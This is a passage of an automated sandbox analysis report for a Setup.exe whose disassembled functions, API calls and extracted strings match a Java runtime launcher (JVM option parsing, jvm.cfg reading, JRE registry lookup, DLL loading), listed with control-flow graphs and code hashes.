7ff764a12ea0-7ff764a12eb8 call 7ff764a1f730 call 7ff764a111b8 633->637 642 7ff764a13028-7ff764a13047 call 7ff764a1f730 call 7ff764a111b8 636->642 643 7ff764a12eef-7ff764a12f00 call 7ff764a1124c 636->643 649 7ff764a12eca-7ff764a12ed6 call 7ff764a14560 637->649 650 7ff764a12eba-7ff764a12ec5 637->650 654 7ff764a1304a call 7ff764a14560 642->654 643->642 653 7ff764a12f06-7ff764a12f17 call 7ff764a1124c 643->653 660 7ff764a1304f-7ff764a1305e call 7ff764a117b4 649->660 650->654 653->642 663 7ff764a12f1d-7ff764a12f2e call 7ff764a1124c 653->663 654->660 660->551 663->642 667 7ff764a12f34-7ff764a12f45 call 7ff764a257e0 663->667 670 7ff764a13017-7ff764a13026 call 7ff764a16630 667->670 671 7ff764a12f4b-7ff764a12f5c call 7ff764a257e0 667->671 670->551 671->670 676 7ff764a12f62-7ff764a12f73 call 7ff764a257e0 671->676 676->670 679 7ff764a12f79-7ff764a12f8a call 7ff764a1124c 676->679 679->551 682 7ff764a12f90-7ff764a12fa1 call 7ff764a257e0 679->682 682->551 685 7ff764a12fa7-7ff764a12fb8 call 7ff764a257e0 682->685 685->551 688 7ff764a12fbe-7ff764a12fcf call 7ff764a1124c 685->688 688->551 691 7ff764a12fd5-7ff764a12fdf call 7ff764a16ec0 688->691 691->551 694 7ff764a12fe5-7ff764a12ff6 call 7ff764a1124c 691->694 694->551 697 7ff764a12ffc-7ff764a1300d call 7ff764a1124c 694->697 697->551 700 7ff764a1300f-7ff764a13012 697->700 700->590
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: %s full version "%s"$-Dsun.java.launcher.diag=true$-X%s$-Xdebug$-Xdiag$-Xfuture$-Xnoclassgc$-Xrunhprof:cpu=old,file=%s$-Xrunhprof:cpu=old,file=java.prof$-XshowSettings$-XshowSettings:$-Xt$-Xtm$-Xverify:all$-Xverify:none$-Xverify:remote$-checksource$-classpath$-cp$-cs$-d32$-d64$-debug$-fullversion$-help$-jar$-jre-restrict-search$-ms$-mx$-no-jre-restrict-search$-noasyncgc$-noclassgc$-noverify$-oss$-prof$-showversion$-splash:$-ss$-tm$-verbose:gc$-verbosegc$-verify$-verifyremote$-version$-version:$Error: %s requires class path specification$Error: %s requires jar file specification$Warning: %s option is no longer supported.
                                                                                                                                                                                                            • API String ID: 0-425787817
                                                                                                                                                                                                            • Opcode ID: 7f036084960183b661eefc96a1ce56b9723c185c94b0e4ace30ccc05ddc543be
                                                                                                                                                                                                            • Instruction ID: 59b13928f68bee6c13acb496809f3b6372ce11ea0440fe99a00e55fd0d5797b0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f036084960183b661eefc96a1ce56b9723c185c94b0e4ace30ccc05ddc543be
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54E11460A0C603F0FA52FF179AC1AB9A7A96F457C0FE44031DD4E97A96EF6CE5058321
                                                                                                                                                                                                            Function 00007FF764A1230C Relevance: 52.8, APIs: 8, Strings: 22, Instructions: 348COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 701 7ff764a1230c-7ff764a12394 call 7ff764a16ebc call 7ff764a15660 call 7ff764a1bb50 call 7ff764a111b0 710 7ff764a12413-7ff764a12432 call 7ff764a111e4 701->710 711 7ff764a12396-7ff764a123ea call 7ff764a1115c * 4 701->711 719 7ff764a12438-7ff764a12442 710->719 720 7ff764a12830-7ff764a12843 call 7ff764a16630 call 7ff764a1fb70 710->720 711->710 740 7ff764a123ec 711->740 722 7ff764a12460-7ff764a1246e 719->722 723 7ff764a12444-7ff764a1245a call 7ff764a14088 719->723 729 7ff764a12479-7ff764a12484 722->729 730 7ff764a12470-7ff764a12473 722->730 723->722 751 7ff764a127c6 723->751 731 7ff764a12487 call 7ff764a16114 729->731 730->729 735 7ff764a1252c-7ff764a12534 730->735 736 7ff764a1248c-7ff764a12492 731->736 737 7ff764a1253a-7ff764a12541 735->737 738 7ff764a127ae-7ff764a127c4 call 7ff764a13138 735->738 741 7ff764a124d8-7ff764a124df call 7ff764a16630 736->741 742 7ff764a12494-7ff764a124c5 736->742 737->738 743 7ff764a12547-7ff764a1254a 737->743 738->751 763 7ff764a127f7-7ff764a12803 738->763 746 7ff764a123ef-7ff764a12411 call 7ff764a1115c 740->746 755 7ff764a124e4-7ff764a124f1 741->755 742->741 758 7ff764a124c7-7ff764a124d6 742->758 743->738 750 7ff764a12550-7ff764a12553 743->750 746->710 750->738 756 7ff764a12559-7ff764a12569 750->756 754 7ff764a127ca call 7ff764a16904 751->754 764 7ff764a127cf-7ff764a127db 754->764 769 7ff764a1251f-7ff764a12526 755->769 770 7ff764a124f3-7ff764a124f7 call 7ff764a16904 755->770 760 7ff764a1256b 756->760 761 7ff764a12592-7ff764a1259e call 7ff764a111e4 call 7ff764a111b0 756->761 758->755 766 7ff764a1256e-7ff764a12590 call 7ff764a111e4 760->766 786 7ff764a125bf-7ff764a125c6 call 7ff764a111b0 761->786 787 7ff764a125a0-7ff764a125ba call 7ff764a15660 call 7ff764a15638 call 7ff764a112a8 761->787 779 7ff764a12813-7ff764a1281d 763->779 780 7ff764a12805-7ff764a12811 call 7ff764a16630 763->780 782 7ff764a127e9-7ff764a127f5 764->782 783 7ff764a127dd-7ff764a127e4 call 7ff764a16630 764->783 766->761 775 7ff764a12528 769->775 776 7ff764a124fc-7ff764a12508 769->776 770->776 775->735 789 7ff764a12518-7ff764a1251a 776->789 790 7ff764a1250a-7ff764a12516 call 7ff764a16630 776->790 797 7ff764a1281f-7ff764a1282f 779->797 780->779 782->797 783->782 802 7ff764a12627-7ff764a12646 call 7ff764a128b4 786->802 803 7ff764a125c8-7ff764a125fc call 7ff764a1115c * 2 786->803 787->786 789->782 790->789 802->751 814 7ff764a1264c-7ff764a1264f 802->814 803->802 813 7ff764a125fe-7ff764a12602 803->813 815 7ff764a12605-7ff764a12621 call 7ff764a1115c 813->815 816 7ff764a12651-7ff764a1265d call 7ff764a16630 814->816 817 7ff764a12662-7ff764a12674 call 7ff764a11d58 814->817 826 7ff764a12623 815->826 816->764 824 7ff764a12687-7ff764a126aa 817->824 825 7ff764a12676-7ff764a12685 call 7ff764a16630 817->825 824->825 831 7ff764a126ac-7ff764a126bb 824->831 830 7ff764a126be-7ff764a126cb 825->830 826->802 830->751 834 7ff764a126d1-7ff764a126d4 830->834 831->830 834->816 835 7ff764a126da-7ff764a126fb call 7ff764a16ebc 834->835 835->754 839 7ff764a12701-7ff764a1272b 835->839 839->751 842 7ff764a12731-7ff764a12734 839->842 842->816 843 7ff764a1273a-7ff764a1275b call 7ff764a156ac 842->843 843->751 847 7ff764a1275d-7ff764a12760 843->847 847->816 848 7ff764a12766-7ff764a1279a 847->848 852 7ff764a127aa-7ff764a127ac 848->852 853 7ff764a1279c-7ff764a127a8 call 7ff764a16630 848->853 852->782 853->852
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: wprintf$FrequencyPerformanceQuery
                                                                                                                                                                                                            • String ID: argv[%2d] = '%s'$ option[%2d] = '%s'$%ld micro seconds to InitializeJVM$%s is '%s'$()Ljava/lang/Class;$()V$([Ljava/lang/String;)V$App's argc is %d$Error: A JNI error has occurred, please check your installation and try again$Error: Could not create the Java Virtual Machine.Error: A fatal exception has occurred. Program will exit.$Error: Could not detach main thread.Error: A JNI error has occurred, please check your installation and try again$JNI_FALSE$JNI_TRUE$JavaVM args: $getApplicationClass$ignoreUnrecognized is %s, $main$nOptions is %ld$print$println$sun/misc/Version$version 0x%08lx,
                                                                                                                                                                                                            • API String ID: 55271498-324781675
                                                                                                                                                                                                            • Opcode ID: a2830ed6dd11f73e3a7db01377140e82db5158da22dd514a3a82fd16b2e03892
                                                                                                                                                                                                            • Instruction ID: c92c70004b84bd8f437e002933c6175c8add93a05e9c0d08ea1ce04f009d2426
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2830ed6dd11f73e3a7db01377140e82db5158da22dd514a3a82fd16b2e03892
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77F14F62B09A42E5EB02EF67D8C09F9A771BF95B84BA40036DD0D537A5DE3CE449C360
                                                                                                                                                                                                            Function 00007FF764A15C4C Relevance: 38.8, APIs: 9, Strings: 13, Instructions: 311processsynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1371 7ff764a15c4c-7ff764a15ca4 call 7ff764a11d94 GetModuleFileNameA 1374 7ff764a160f9-7ff764a16113 call 7ff764a16728 call 7ff764a1fb70 1371->1374 1375 7ff764a15caa-7ff764a15caf 1371->1375 1375->1374 1376 7ff764a15cb5-7ff764a15ced call 7ff764a112a8 * 2 call 7ff764a1f730 call 7ff764a2a3e4 1375->1376 1389 7ff764a16057-7ff764a16086 call 7ff764a1ac60 1376->1389 1390 7ff764a15cf3-7ff764a15d66 call 7ff764a16934 GetCommandLineA call 7ff764a1127c call 7ff764a1709c call 7ff764a1f730 * 2 call 7ff764a111b8 call 7ff764a1bfb8 1376->1390 1407 7ff764a15d87-7ff764a15dac call 7ff764a25710 call 7ff764a25670 * 2 1390->1407 1408 7ff764a15d68-7ff764a15d77 call 7ff764a1bfb8 1390->1408 1419 7ff764a15db1-7ff764a15db7 1407->1419 1408->1407 1413 7ff764a15d79-7ff764a15d85 call 7ff764a25710 1408->1413 1413->1419 1420 7ff764a15dbc 1419->1420 1421 7ff764a15f78-7ff764a15f87 call 7ff764a111e4 call 7ff764a111b0 1420->1421 1422 7ff764a15dc2-7ff764a15dd2 call 7ff764a1709c 1420->1422 1433 7ff764a15f89-7ff764a15fca call 7ff764a1127c call 7ff764a1709c call 7ff764a1115c * 2 call 7ff764a111e4 1421->1433 1434 7ff764a15fcf-7ff764a16053 call 7ff764a1cbc8 call 7ff764a27088 call 7ff764a1cbc8 call 7ff764a27088 call 7ff764a1bb50 * 2 CreateProcessA 1421->1434 1428 7ff764a15dd8-7ff764a15df4 call 7ff764a1f730 call 7ff764a111b8 1422->1428 1429 7ff764a15f2a-7ff764a15f32 1422->1429 1442 7ff764a15e49-7ff764a15e4b 1428->1442 1429->1420 1433->1434 1496 7ff764a1609f-7ff764a160b1 WaitForSingleObject 1434->1496 1497 7ff764a16055-7ff764a1609e call 7ff764a16728 call 7ff764a1fb70 1434->1497 1445 7ff764a15e4d-7ff764a15e53 1442->1445 1446 7ff764a15df6-7ff764a15df9 1442->1446 1449 7ff764a15f37-7ff764a15f73 call 7ff764a25670 * 4 call 7ff764a111e4 1445->1449 1450 7ff764a15e59-7ff764a15e6a call 7ff764a257e0 1445->1450 1451 7ff764a15dfb-7ff764a15dfe 1446->1451 1452 7ff764a15e44 1446->1452 1449->1421 1467 7ff764a15e6c-7ff764a15e7d call 7ff764a257e0 1450->1467 1468 7ff764a15ed6-7ff764a15f03 call 7ff764a25670 * 2 call 7ff764a1709c 1450->1468 1457 7ff764a15e3f-7ff764a15e41 1451->1457 1458 7ff764a15e00-7ff764a15e16 call 7ff764a25d80 1451->1458 1454 7ff764a15e47 1452->1454 1454->1442 1457->1452 1475 7ff764a15e38-7ff764a15e3b 1458->1475 1476 7ff764a15e18-7ff764a15e25 1458->1476 1467->1468 1488 7ff764a15e7f-7ff764a15e96 call 7ff764a1f7f0 1467->1488 1505 7ff764a15f22-7ff764a15f25 call 7ff764a111e4 1468->1505 1512 7ff764a15f05-7ff764a15f14 call 7ff764a25670 1468->1512 1484 7ff764a15e3d 1475->1484 1485 7ff764a15e2e-7ff764a15e35 1475->1485 1476->1454 1482 7ff764a15e27-7ff764a15e2a 1476->1482 1482->1476 1489 7ff764a15e2c 1482->1489 1484->1454 1485->1475 1504 7ff764a15e9c-7ff764a15ead call 7ff764a257e0 1488->1504 1488->1505 1489->1454 1500 7ff764a160c9-7ff764a160d0 call 7ff764a16630 1496->1500 1501 7ff764a160b3-7ff764a160c5 GetExitCodeProcess 1496->1501 1497->1496 1515 7ff764a160d5 1500->1515 1509 7ff764a160c7 1501->1509 1510 7ff764a160d9-7ff764a160f8 CloseHandle * 2 call 7ff764a1fb70 1501->1510 1504->1505 1522 7ff764a15eaf-7ff764a15ec0 call 7ff764a257e0 1504->1522 1505->1429 1509->1515 1510->1374 1525 7ff764a15f17-7ff764a15f1f call 7ff764a25670 1512->1525 1515->1510 1522->1505 1529 7ff764a15ec2-7ff764a15ed4 call 7ff764a25670 1522->1529 1525->1505 1529->1525
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseHandleProcesswprintf$CodeCommandCreateExitFileLineMessageModuleNameObjectSingleWait_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: %s\bin\%s.exe$-classpath$-cp$-jre-restrict-search$-no-jre-restrict-search$-version:$Error: CreateProcess(%s, ...) failed:$Error: Unable to resolve %s$Error: WaitForSingleObject() failed.$ExecJRE: new: %s$ExecJRE: old: %s$ReExec Args: %s$ReExec Command: %s (%s)
                                                                                                                                                                                                            • API String ID: 2354071828-2302492997
                                                                                                                                                                                                            • Opcode ID: 155a8a214b59518197faade966d3838315f6f093e45cc8a2a11e5612f3aa2eb2
                                                                                                                                                                                                            • Instruction ID: f59495b29a0eb49736cc63b4b25b86d05f887684f83b059181127244d017a3da
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 155a8a214b59518197faade966d3838315f6f093e45cc8a2a11e5612f3aa2eb2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2D17E61E08642E6FA02FF63D8D1AB9E361BF85780FE44435D94D87796EE6CE5058320
                                                                                                                                                                                                            Function 00007FF764A13E6C Relevance: 33.4, APIs: 5, Strings: 14, Instructions: 127COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: wprintf$CurrentProcess
                                                                                                                                                                                                            • String ID: %s%d$%s%d=%s$-$-$-XX:NativeMemoryTracking=$-classpath$-cp$-fullversion$-help$-jar$-version$TRACER_MARKER: NativeMemoryTracking: env var is %s$TRACER_MARKER: NativeMemoryTracking: got value %s$TRACER_MARKER: NativeMemoryTracking: putenv arg %s
                                                                                                                                                                                                            • API String ID: 2490283382-3922024441
                                                                                                                                                                                                            • Opcode ID: 2ab74741108a55d3cfd27af9a4642a2124bf9988204b8e18245889c09d8eede1
                                                                                                                                                                                                            • Instruction ID: 3847cc6b371d317ecee59ae2fd7fc3757340592f5255a678bc09fbdf6af709d6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ab74741108a55d3cfd27af9a4642a2124bf9988204b8e18245889c09d8eede1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59514E60E09743E0FA02BF17A9C09B9D3A56F85BC4FE80431ED4E97297EE6CE5018324
                                                                                                                                                                                                            Function 00007FF764A1348C Relevance: 31.8, APIs: 1, Strings: 17, Instructions: 269COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00007FF764A15660: QueryPerformanceFrequency.KERNEL32(?,?,?,?,00007FF764A13857), ref: 00007FF764A15674
                                                                                                                                                                                                              • Part of subcall function 00007FF764A1FD30: _invalid_parameter_noinfo.LIBCMT ref: 00007FF764A1FC99
                                                                                                                                                                                                            • wprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF764A1386E
                                                                                                                                                                                                              • Part of subcall function 00007FF764A16630: MessageBoxA.USER32 ref: 00007FF764A166D2
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FrequencyMessagePerformanceQuery_invalid_parameter_noinfowprintf
                                                                                                                                                                                                            • String ID: name: %s vmType: %s alias: %s$ name: %s vmType: %s server_class: %s$%ld micro seconds to parse jvm.cfg$ALIASED_TO$ERROR$Error: could not open `%s'$IF_SERVER_CLASS$IGNORE$KNOWN$VM_ALIASED_TO$VM_IF_SERVER_CLASS$WARN$Warning: Missing VM type on line %d of `%s'$Warning: Missing server class VM on line %d of `%s'$Warning: No leading - on line %d of `%s'$Warning: Unknown VM type on line %d of `%s'$jvm.cfg[%d] = ->%s<-
                                                                                                                                                                                                            • API String ID: 2156942979-2085308502
                                                                                                                                                                                                            • Opcode ID: cb4146e40dd08ca8a27a13731992efbe169cded30751264641f7d419cabc5844
                                                                                                                                                                                                            • Instruction ID: ab5ff7ddb9dfcc5f3baf223bae93b28a0422115f2bdd3508cc2c31a92e444232
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb4146e40dd08ca8a27a13731992efbe169cded30751264641f7d419cabc5844
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78C19165A0C642E1FA12FF13E8D0AB9E7B1AF99784FE44135D98E47796DE3CE4058320
                                                                                                                                                                                                            Function 00007FF764A1533C Relevance: 31.7, APIs: 8, Strings: 10, Instructions: 179libraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LibraryLoad$AddressProc$Message
                                                                                                                                                                                                            • String ID: Error: Path length exceeds maximum length (PATH_MAX)$J2D_D3D$J2D_D3D_PRELOAD$\bin\awt.dll$\bin\java.dll$\bin\verify.dll$false$preloadD3D$preloadStop$true
                                                                                                                                                                                                            • API String ID: 3101497455-3693045609
                                                                                                                                                                                                            • Opcode ID: 5a36ed472193ec25cfcea15ef0ae03a46e7eea35b8d27c3ab642bdf1c246a56a
                                                                                                                                                                                                            • Instruction ID: 66904c22feac31978e46e3750097efbe299a9fc161764619e244c05902557e81
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a36ed472193ec25cfcea15ef0ae03a46e7eea35b8d27c3ab642bdf1c246a56a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00814221A19642E5FA16FF13E4D0AB9A362BF88790FE80135D94E83795EF7CE505C720
                                                                                                                                                                                                            Function 00007FF764A16AA0 Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 123libraryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                                                                            • String ID: CRT path is %s$Error: Path length exceeds maximum length (PATH_MAX)$Error: loading: %s$PRT path is %s$\bin\$\bin\msvcp140.dll$\bin\vcruntime140.dll$\bin\vcruntime140_1.dll$msvcp140.dll$vcruntime140.dll$vcruntime140_1.dll
                                                                                                                                                                                                            • API String ID: 1029625771-2662282541
                                                                                                                                                                                                            • Opcode ID: 7ae692a7edd89861307a543ce10e74eaf73cecd1090d2a29193a5a2aca219c8b
                                                                                                                                                                                                            • Instruction ID: addc22c18df8aa495d93d1a75f723c85699fe0df7877b394e4d0a138069845dc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ae692a7edd89861307a543ce10e74eaf73cecd1090d2a29193a5a2aca219c8b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68510061A18582F2EE12FF12E4D19B9E376FF94348FE45035E94D836A6EE2CE505C720
                                                                                                                                                                                                            Function 00007FF764A16CC4 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 126registryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Close$EnumOpen$QueryValue
                                                                                                                                                                                                            • String ID: JavaHome$Software\JavaSoft\Java Runtime Environment
                                                                                                                                                                                                            • API String ID: 2572215972-2531112370
                                                                                                                                                                                                            • Opcode ID: 496ad6ac866e299300a81ee0ee3a9b0d22cb923cfb6ab4ff93528eee10404356
                                                                                                                                                                                                            • Instruction ID: 44f49e571725486bcf9b9bac36baf2ffaa6d5a9a5471f8b94b6fbc9a9e7d0ef3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 496ad6ac866e299300a81ee0ee3a9b0d22cb923cfb6ab4ff93528eee10404356
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43518436A19A42E2FA52AF13E4C0ABAE3A5FF85B84F941131ED4D83754EF3CD1058710
                                                                                                                                                                                                            Function 00007FF764A154B4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 99synchronizationthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseHandleThread$CodeCreateErrorExitFreeLastLibraryObjectSingleWait_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: J2D_D3D$J2D_D3D_PRELOAD$false$preloadD3D$true
                                                                                                                                                                                                            • API String ID: 2847611408-3397395437
                                                                                                                                                                                                            • Opcode ID: c9f113a99d199f25bf34a784e1bde5df4a05aedc6fa0d44eeea2a721a9ada148
                                                                                                                                                                                                            • Instruction ID: a23b28824e3876704535c2dc96843e4365534ed29834cf6f2fee683b1dccf99e
